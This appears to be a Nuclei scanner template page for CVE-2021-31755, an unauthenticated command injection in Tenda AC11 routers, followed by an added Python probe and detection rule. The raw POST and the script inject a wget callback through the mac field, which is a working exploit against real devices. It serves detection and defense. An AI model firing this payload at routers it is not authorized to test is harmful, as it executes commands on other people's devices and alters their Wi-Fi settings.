Tenda Router AC11 - Remote Command Injection
ID: CVE-2021-31755
Severity: critical
Author: gy741
Tags: cve2021,cve,tenda,rce,oast,router,mirai,kev
Description

Tenda AC11 routers are vulnerable to remote command injection in the web-based management interface: the value of the mac parameter posted to /goform/setmac is passed to a system shell without sanitization, so an unauthenticated, remote attacker can execute arbitrary OS commands on the device with a single crafted POST request.
YAML Source

id: CVE-2021-31755

info:
  name: Tenda Router AC11 - Remote Command Injection
  author: gy741
  severity: critical
  description: Tenda Router AC11 is susceptible to remote command injection vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data exfiltration, and complete compromise of the affected router.
  remediation: |
    Apply the latest firmware update provided by Tenda to fix the remote command injection vulnerability (CVE-2021-31755).
  reference:
    - https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3
    - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
    - https://nvd.nist.gov/vuln/detail/CVE-2021-31755
    - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
    - https://github.com/Yu3H0/IoT_CVE
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-31755
    cwe-id: CWE-787
    epss-score: 0.97104
    epss-percentile: 0.99781
    cpe: cpe:2.3:o:tenda:ac11_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: tenda
    product: ac11_firmware
  tags: cve2021,cve,tenda,rce,oast,router,mirai,kev

http:
  - raw:
      - |
        POST /goform/setmac HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}/index.html
        Content-Type: application/x-www-form-urlencoded

        module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

Guide to check the vulnerabilities

This template performs an out-of-band (OAST) check instead of matching on the device's response. It sends a single POST to /goform/setmac carrying the full wifiBasicCfg form, with the mac field set to "wget http://{{interactsh-url}}". If the device hands that value to a shell, the router fetches the URL and the interactsh server records an HTTP interaction; the matcher (part: interactsh_protocol, word "http") fires on that record, so nothing in the HTTP reply itself is inspected. Because the verdict depends on the callback, the router needs outbound HTTP access to the interactsh server; on an isolated network, point Nuclei at a self-hosted instance with -iserver. Two caveats before running it against a live device: the probe genuinely executes a command on the target, and the form body also carries wireless settings (wifiSSID=Tenda_B0E040, wifiPwd=Password12345) that the handler may apply, so run it only with authorization and be prepared to restore the device's Wi-Fi configuration.

$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-31755.yaml"
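The following is an added example, not code from the Nuclei project or the template author. It reproduces the template's OAST check in stand-alone Python for cases where Nuclei or a public interactsh instance is unavailable: it starts an in-process HTTP listener with a random token in the path, posts the template's form body with the mac field set to a wget call back to that listener, and reports the device as vulnerable only if the callback arrives. It assumes the router can reach the host running the script over HTTP (you pass that host's address on the command line) and, like the template, that the device has a wget binary. A defender-side predicate is included so the same request body can be used to exercise detection logic: any setmac request whose mac is not a bare MAC address is flagged, which catches command payloads without relying on a blocklist of shell characters.

```python
#!/usr/bin/env python3
"""Stand-alone OAST check for the Tenda AC11 /goform/setmac command injection (added example)."""
import re
import secrets
import threading
import time
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Request body copied from the Nuclei template; only `mac` is replaced at run time.
TEMPLATE_BODY = (
    "module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true"
    "&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES"
    "&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G"
    "&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false"
    "&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G"
    "&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high"
    "&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto"
    "&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false"
    "&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static"
)

MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(:[0-9A-Fa-f]{2}){5}$")


def build_body(callback_url: str) -> str:
    """Return the template's form body with `mac` set to a wget call to callback_url."""
    fields = urllib.parse.parse_qsl(TEMPLATE_BODY, keep_blank_values=True)
    fields = [(k, f"wget {callback_url}" if k == "mac" else v) for k, v in fields]
    # safe=":/" leaves the URL readable, as in the template; the space still becomes '+'.
    return urllib.parse.urlencode(fields, safe=":/")


def flag_setmac_request(path: str, body: str) -> bool:
    """Detection rule: a setmac POST whose `mac` is not a plain MAC address is suspicious."""
    if not path.startswith("/goform/setmac"):
        return False
    fields = dict(urllib.parse.parse_qsl(body, keep_blank_values=True))
    mac = fields.get("mac")
    return mac is not None and MAC_RE.match(mac) is None


class CallbackListener:
    """Minimal HTTP listener standing in for interactsh; records every GET it receives."""

    def __init__(self, bind: str = "0.0.0.0", port: int = 0) -> None:
        self.token = secrets.token_hex(8)  # unguessable path so stray traffic cannot fake a hit
        self.hits: list[tuple[str, str]] = []
        listener = self

        class Handler(BaseHTTPRequestHandler):
            def do_GET(self) -> None:
                listener.hits.append((self.client_address[0], self.path))
                self.send_response(200)
                self.end_headers()

            def log_message(self, *args) -> None:  # keep stdout quiet
                pass

        self.server = ThreadingHTTPServer((bind, port), Handler)
        threading.Thread(target=self.server.serve_forever, daemon=True).start()

    def url(self, reachable_host: str) -> str:
        return f"http://{reachable_host}:{self.server.server_address[1]}/{self.token}"

    def wait(self, timeout: float) -> bool:
        """Poll until a request for our token arrives or the timeout expires."""
        deadline = time.monotonic() + timeout
        while time.monotonic() < deadline:
            if any(self.token in path for _, path in self.hits):
                return True
            time.sleep(0.2)
        return False

    def close(self) -> None:
        self.server.shutdown()
        self.server.server_close()


def probe(target_base: str, listener_host: str, timeout: float = 10.0) -> bool:
    """POST the injected form to the router and return True if the callback is observed."""
    listener = CallbackListener()
    try:
        body = build_body(listener.url(listener_host)).encode()
        req = urllib.request.Request(
            f"{target_base}/goform/setmac", data=body, method="POST",
            headers={"Content-Type": "application/x-www-form-urlencoded",
                     "Origin": target_base, "Referer": f"{target_base}/index.html"},
        )
        try:
            urllib.request.urlopen(req, timeout=timeout).read()
        except Exception:
            pass  # the handler may stall or reset while the command runs; only the callback matters
        return listener.wait(timeout)
    finally:
        listener.close()


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} http://<router> <address-of-this-host-reachable-from-router>")
    print("VULNERABLE: callback received" if probe(sys.argv[1], sys.argv[2])
          else "no callback within timeout")
```

Run it as `python3 check_tenda_ac11.py http://192.168.0.1 192.168.0.50` from a host the router can reach; the same caveats as for the Nuclei template apply, since the request both executes a command and submits wireless settings. For detection, feed flag_setmac_request() the path and body of each POST seen by a reverse proxy or IDS in front of the management interface; a legitimate client only ever sends a six-octet MAC in that field.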